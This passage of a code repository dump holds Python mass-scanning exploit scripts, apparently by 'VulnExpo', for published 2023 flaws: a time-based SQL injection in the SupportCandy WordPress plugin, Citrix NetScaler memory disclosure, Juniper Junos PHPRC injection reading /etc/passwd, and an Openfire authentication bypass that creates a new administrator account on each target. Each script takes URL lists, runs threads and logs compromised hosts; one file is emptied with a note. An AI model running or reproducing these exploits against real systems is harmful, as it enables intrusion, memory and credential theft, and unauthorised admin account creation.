12 | 		headers = {'Cookie': 'wpsc_guest_login_auth={"email":"\' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}'}
13 | 
14 | 		# 检查响应时间
15 | 		start_time = time.time()
16 | 		response = requests.get(url, headers=headers, proxies=proxies, verify=False)
17 | 		end_time = time.time()
18 | 		duration = end_time - start_time
19 | 
20 | 		if response.status_code == 200 and "supportcandy" in response.text and duration >= 6:
21 | 			print(f"目标URL: {url}")
22 | 			with open(success_file, 'a') as s_file:
23 | 				s_file.write(f"++++++++++++++++++\n")
24 | 				s_file.write(f"目标URL: {url}\n")
25 | 				s_file.write(f"响应内容: 响应时间：{duration} 秒\n\n")
26 | 			return True
27 | 	except Exception as e:
28 | 		print(f"发生异常：{e}")
29 | 		return False
30 | 
31 | def scan_targets(targets, proxies=None, success_file=None):
32 | 	for target in targets:
33 | 		target = target.strip()
34 | 		check_for_vulnerability(target, proxies, success_file)
35 | 
36 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
37 | 	threads = []
38 | 
39 | 	for i in range(num_threads):
40 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
41 | 		threads.append(thread)
42 | 
43 | 	for thread in threads:
44 | 		thread.start()
45 | 
46 | 	for thread in threads:
47 | 		thread.join()
48 | 
49 | if __name__ == '__main__':
50 | 	parser = argparse.ArgumentParser(description="WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730")
51 | 	parser.add_argument("-u", "--url", help="目标URL")
52 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
53 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
54 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
55 | 	args = parser.parse_args()
56 | 
57 | 	if not args.url and not args.file:
58 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
59 | 		exit(1)
60 | 
61 | 	if args.url:
62 | 		urls = [args.url]
63 | 	elif args.file:
64 | 		with open(args.file, 'r') as file:
65 | 			urls = file.readlines()
66 | 
67 | 	success_file = 'success_targets.txt'
68 | 
69 | 	proxies = {
70 | 		"http": args.proxy,
71 | 		"https": args.proxy
72 | 	} if args.proxy else None
73 | 
74 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
75 | 
76 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
77 | 


--------------------------------------------------------------------------------
/citrix_CVE-2023-4966_exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-10-27
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | import urllib3
 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 9 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
10 | 
11 | def check_for_vulnerability(url, proxies=None, success_file=None):
12 | 	headers = {
13 | 		"Host": "a"*24576
14 | 	}
15 | 	try:
16 | 		response = requests.get(url + "/oauth/idp/.well-known/openid-configuration", headers=headers, proxies=proxies, verify=False, timeout=10)
17 | 		print(url + "/oauth/idp/.well-known/openid-configuration")
18 | 		print(response)
19 | 		if response.status_code == 200:
20 | 			with open(success_file, 'a') as s_file:
21 | 				s_file.write(f"++++++++++++++++++\n")
22 | 				s_file.write(f"目标URL: {url}\n")
23 | 				s_file.write(f"Payload: Dumped Memory\n")
24 | 				s_file.write(f"响应内容:\n{response.text[131050:]}\n\n")
25 | 			return True
26 | 	except Exception as e:
27 | 		print(f"发生异常：{e}")
28 | 		return False
29 | 
30 | def scan_targets(targets, proxies=None, success_file=None):
31 | 	for target in targets:
32 | 		target = target.strip()
33 | 		check_for_vulnerability(target, proxies, success_file)
34 | 
35 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
36 | 	threads = []
37 | 
38 | 	for i in range(num_threads):
39 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
40 | 		threads.append(thread)
41 | 
42 | 	for thread in threads:
43 | 		thread.start()
44 | 
45 | 	for thread in threads:
46 | 		thread.join()
47 | 
48 | if __name__ == '__main__':
49 | 	parser = argparse.ArgumentParser(description="Citrix NetScaler ADC & Gateway信息泄露漏洞 CVE-2023-4966")
50 | 	parser.add_argument("-u", "--url", help="目标URL")
51 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
52 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
53 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
54 | 	args = parser.parse_args()
55 | 
56 | 	if not args.url and not args.file:
57 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
58 | 		exit(1)
59 | 
60 | 	if args.url:
61 | 		urls = [args.url]
62 | 	elif args.file:
63 | 		with open(args.file, 'r') as file:
64 | 			urls = file.readlines()
65 | 
66 | 	success_file = 'success_targets.txt'
67 | 
68 | 	proxies = {
69 | 		"http": args.proxy,
70 | 		"https": args.proxy
71 | 	} if args.proxy else None
72 | 
73 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
74 | 
75 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
76 | 


--------------------------------------------------------------------------------
/f5_CVE-2023-46747_exploit.py:
--------------------------------------------------------------------------------
1 | （抱歉，脚本存在问题，无法正常使用，所以先删了！仅作学习）
2 | 


--------------------------------------------------------------------------------
/juniper-cve-2023-36845.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-9-22
 3 | 
 4 | import requests
 5 | import argparse
 6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 7 | 
 8 | def check_for_vulnerability(url, proxies={}, success_file=None):
 9 |     headers = {
10 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
11 |     }
12 |     payload = 'auto_prepend_file="/etc/passwd"'
13 |     try:
14 |         response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False)
15 |         if response.status_code == 200 and "root:" in response.text:
16 |             with open(success_file, 'a') as s_file:
17 |                 s_file.write(f"++++++++++++++++++\n")
18 |                 s_file.write(f"目标URL: {url}\n")
19 |                 s_file.write(f"Payload: cat /etc/passwd\n")
20 |                 s_file.write(f"响应内容:\n{response.text}\n\n")
21 |             return True
22 |     except Exception as e:
23 |         print(f"发生异常：{e}")
24 |     return False
25 | 
26 | def scan_targets(targets, proxies={}, success_file=None):
27 |     for target in targets:
28 |         target = target.strip()
29 |         check_for_vulnerability(target, proxies, success_file)
30 | 
31 | if __name__ == '__main__':
32 |     parser = argparse.ArgumentParser(description="Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844")
33 |     parser.add_argument("-u", "--url", help="目标URL")
34 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
35 |     args = parser.parse_args()
36 | 
37 |     if not args.url and not args.file:
38 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
39 |         exit(1)
40 | 
41 |     if args.url:
42 |         urls = [args.url]
43 |     elif args.file:
44 |         with open(args.file, 'r') as file:
45 |             urls = file.readlines()
46 | 
47 |     proxies = {}
48 |     success_file = 'success_targets.txt'
49 | 
50 |     for url in urls:
51 |         url = url.strip()
52 |         scan_targets([url], proxies, success_file)
53 | 
54 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
55 | 


--------------------------------------------------------------------------------
/openfire_CVE-2023-32315_exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-10-23
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | import httplib2
 8 | import random
 9 | import re
10 | import string
11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
12 | 
13 | def generate_random_username(length=8):
14 | 	return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
15 | 
16 | def generate_random_password(length=12):
17 | 	return ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(length))
18 | 
19 | def check_for_vulnerability(url, proxies=None, success_file=None):
20 | 	path = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp'
21 | 	rsp_list = ''
22 | 	http = httplib2.Http(disable_ssl_certificate_validation=True, proxy_info=None, timeout=10)
23 | 	try:
24 | 		response, content = http.request(url + path, method='GET')
25 | 		for header_name, header_value in response.items():
26 | 			rsp_list += header_value
27 | 		if "csrf=" in rsp_list:
28 | 			JSESSIONID = re.findall(r'JSESSIONID=(.*?);', rsp_list)[0]
29 | 			csrf = re.findall(r'csrf=(.*?);', rsp_list)[0]
30 | 		else:
31 | 			return False
32 | 		headers = {
33 | 			'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
34 | 			'Cookie': 'JSESSIONID={}; csrf={}'.format(JSESSIONID, csrf)
35 | 		}
36 | 		random_username = generate_random_username()
37 | 		random_password = generate_random_password()
38 | 		addpath = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={}&username={}&name=&email=&password={}&passwordConfirm={}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7'.format(
39 | 			csrf, random_username, random_password, random_password)
40 | 		add_user, content = http.request(url + addpath, method='GET', headers=headers)
41 | 		if add_user.status == 200 and "at" in content.decode('utf-8'):
42 | 			print(f"目标URL: {url} username: {random_username}, password: {random_password}")
43 | 			with open(success_file, 'a') as s_file:
44 | 				s_file.write(f"++++++++++++++++++\n")
45 | 				s_file.write(f"目标URL: {url}\n")
46 | 				s_file.write(f"响应内容: username: {random_username}, password: {random_password}\n\n")
47 | 			return True
48 | 	except Exception as e:
49 | 		print(f"发生异常：{e}")
50 | 	return False
51 | 
52 | def scan_targets(targets, proxies=None, success_file=None):
53 | 	for target in targets:
54 | 		target = target.strip()
55 | 		check_for_vulnerability(target, proxies, success_file)
56 | 
57 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
58 | 	threads = []
59 | 
60 | 	for i in range(num_threads):
61 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
62 | 		threads.append(thread)
63 | 
64 | 	for thread in threads:
65 | 		thread.start()
66 | 
67 | 	for thread in threads:
68 | 		thread.join()
69 | 
70 | if __name__ == '__main__':
71 | 	parser = argparse.ArgumentParser(description="Openfire 身份认证绕过CVE-2023-32315")
72 | 	parser.add_argument("-u", "--url", help="目标URL")
73 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
74 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
75 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
76 | 	args = parser.parse_args()
77 | 
78 | 	if not args.url and not args.file:
79 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
80 | 		exit(1)
81 | 
82 | 	if args.url:
83 | 		urls = [args.url]
84 | 	elif args.file:
85 | 		with open(args.file, 'r') as file:
86 | 			urls = file.readlines()
87 | 
88 | 	success_file = 'success_targets.txt'
89 | 
90 | 	proxies = {
91 | 		"http": args.proxy,
92 | 		"https": args.proxy
93 | 	} if args.proxy else None
94 | 
95 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
96 | 
97 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。"
98 | 


--------------------------------------------------------------------------------